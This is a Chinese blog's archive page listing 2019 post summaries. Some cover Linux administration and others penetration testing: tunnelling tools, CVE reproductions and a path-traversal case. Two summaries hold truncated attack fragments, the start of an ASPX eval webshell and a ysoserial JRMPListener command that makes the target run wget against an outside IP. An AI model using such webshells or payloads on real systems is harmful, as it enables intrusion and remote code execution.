mrhonest

2019年10月9日

posted @ 2019-10-09 16:26 mrhonest 阅读(208) 评论(0) 推荐(0)

日志管理

摘要： rsyslogd lastb 登陆错误日志,文件位于/var/log/btmp,二进制文件 lastlog 记录系统中所有用户最后一次登陆时间的日志,文件位于/var/log/lastlog,二进制文件 last 永久记录所有用户的登陆,注销信息,同时记录系统的启动,重启,关机时间,文件位于/var 阅读全文

posted @ 2019-10-09 16:25 mrhonest 阅读(798) 评论(0) 推荐(0)

启动管理

摘要：运行级别 |运行级别|含义| | | | |0|关机| |1|单用户模式,可以想象为windows的安全模式,主要用于系统痛修复| |2|不完全的命令行模式,不包含NFS服务| |3|完全的命令行模式,就是标准的字符界面| |4|系统保留| |5|图形模式| |6|重启动| runlevel 查看运阅读全文

posted @ 2019-10-09 16:25 mrhonest 阅读(473) 评论(0) 推荐(0)

系统管理

摘要：进程 ps |参数|作用| | | | |a|显示前台进程| |x|显示后台进程| |u|显示进程使用的用户| | l|显示更加详细的信息| | e|显示所有进程| 显示说明 |显示|说明| | | | |USER|该进程由哪个用户产生| |PID|进程的ID号| |%CPU|进程占用CPU的百分比阅读全文

posted @ 2019-10-09 16:23 mrhonest 阅读(251) 评论(0) 推荐(0)

文件系统管理

摘要：主分区最多自能有四个扩展分区最多只能有一个,也算作主分区的一种,不能存储数据和格式化逻辑分区:IDE接口最多59个逻辑分区,scsi接口最多有11个逻辑分区常用命令 df 查看分区(文件)系统的占用情况信息 df命令是从文件系统考虑的,不光要考虑文件占用的空间,还要统计被命令程序序占用的空间( 阅读全文

posted @ 2019-10-09 16:22 mrhonest 阅读(207) 评论(0) 推荐(0)

服务管理

posted @ 2019-10-09 16:22 mrhonest 阅读(217) 评论(0) 推荐(0)

软件包管理

摘要：软件包分类源码包脚本安装包二进制包 RPM包,系统默认包 rpm包管理命名规则 + 包名操作已经安装的软件时,使用包名,是搜索/var/lib/rpm中的数据库 + 包全名操作的是没有安装的软件包时,要注意安装路径 httpd 2.2.15 15.el6.centos.1.i686.rp 阅读全文

posted @ 2019-10-09 16:21 mrhonest 阅读(262) 评论(0) 推荐(0)

用户和用户组管理

posted @ 2019-10-09 16:19 mrhonest 阅读(196) 评论(0) 推荐(0)

权限管理

摘要： ACL权限 + 查看ACL权限查看acl权限 + 设定ACL权限 mask是用来指定最大有效权限的 |参数|作用| | | | | m|设定acl权限| | x|删除指定的acl权限| | b|删除所有acl权限| | d|设定默认的acl权限| | k|删除默认acl权限| | R|递归设定ac 阅读全文

posted @ 2019-10-09 16:18 mrhonest 阅读(202) 评论(0) 推荐(0)

2019年10月8日

漏洞验证系列--MongoDB未授权访问

摘要：本系列文章旨在对于有一定网络安全基础的人员，在日常工作中扫描出来的各种漏洞，如何进行验证，以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。本漏洞是由于MongoDB未设置访问权限，用户可以直接连上该数据库 Linux下执行 mongo 目标ip:端口号 show dbs；#列出有哪些数据库，阅读全文

posted @ 2019-10-08 09:24 mrhonest 阅读(867) 评论(0) 推荐(0)

2019年9月29日

linux就该这么学--资料整理--持续更新

摘要：基础命令服务管理 systemctl redhat7 启动服务重启服务停止服务不重启服务下重新加载配置文件查看服务状态设置服务开机自动启设置服务开机不启动查看服务是否开机自启查看各个界别下的服务的启动与禁用情况常用命令 man whatis ` help apropos echo 阅读全文

posted @ 2019-09-29 22:52 mrhonest 阅读(566) 评论(0) 推荐(0)

2019年9月26日

IPC$渗透使用

摘要：来源:https://www.cnblogs.com/sstfy 简介 IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远阅读全文

posted @ 2019-09-26 22:30 mrhonest 阅读(470) 评论(0) 推荐(0)

2019年9月25日

DNS隧道--dnscat2

摘要：安装服务端客户端服务端和客户端均有编译好的运行直连服务端客户端 DNS 服务端客户端阅读全文

posted @ 2019-09-25 10:06 mrhonest 阅读(1123) 评论(0) 推荐(0)

2019年9月24日

icmp隧道--icmpsh

摘要：本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上详细命令阅读全文

posted @ 2019-09-24 14:56 mrhonest 阅读(592) 评论(0) 推荐(0)

2019年9月23日

泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

摘要：靶机影响版本泛微e cology 阅读全文

posted @ 2019-09-23 21:49 mrhonest 阅读(1126) 评论(0) 推荐(0)

2019年9月21日

Harbor任意管理员注册漏洞复现CVE-2019-16097

摘要：注册时抓包添加poc 管理员权限 POC 阅读全文

posted @ 2019-09-21 10:24 mrhonest 阅读(2527) 评论(0) 推荐(0)

2019年9月19日

ashx后门[转]

摘要： https://www.cnblogs.com/Fluorescence tjy/p/9855828.html 一、标准ASPX一句话木马 .NET平台下的一句话木马则百年不变，最常见的当属下面这句 <%@ Page Language=”Jscript”% <%eval(Request.Item[“ 阅读全文

posted @ 2019-09-19 09:25 mrhonest 阅读(674) 评论(0) 推荐(0)

2019年9月17日

CVE-2017-3248简单复现

摘要：我是这样操作的目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205 阅读全文

posted @ 2019-09-17 15:14 mrhonest 阅读(1511) 评论(0) 推荐(1)

2019年9月12日

一个文件下载

摘要：起因一次授权的渗透测试两个文件下载页面这个很简单了,修改D:\xxx\xxx\xxx\upload\xxx.docx 即可用dama1.jsp文件名下载下来正戏有个上传的地方是这样的正常抓取的数据包我没有保存总之就是把上传成功的文件名改为../../../../../这种然后在下载阅读全文

posted @ 2019-09-12 17:02 mrhonest 阅读(247) 评论(0) 推荐(0)

2019年9月9日

CVE-2019-0708简单复现

摘要：各文件对应位置 windows7 配置参数建立session 获得交互式shell windows2008 R2 64x 蓝屏阅读全文

posted @ 2019-09-09 10:57 mrhonest 阅读(368) 评论(0) 推荐(0)

民间渗透测试人员，学网络，学开发！bXJob25lc3RAcXEuY29t

公告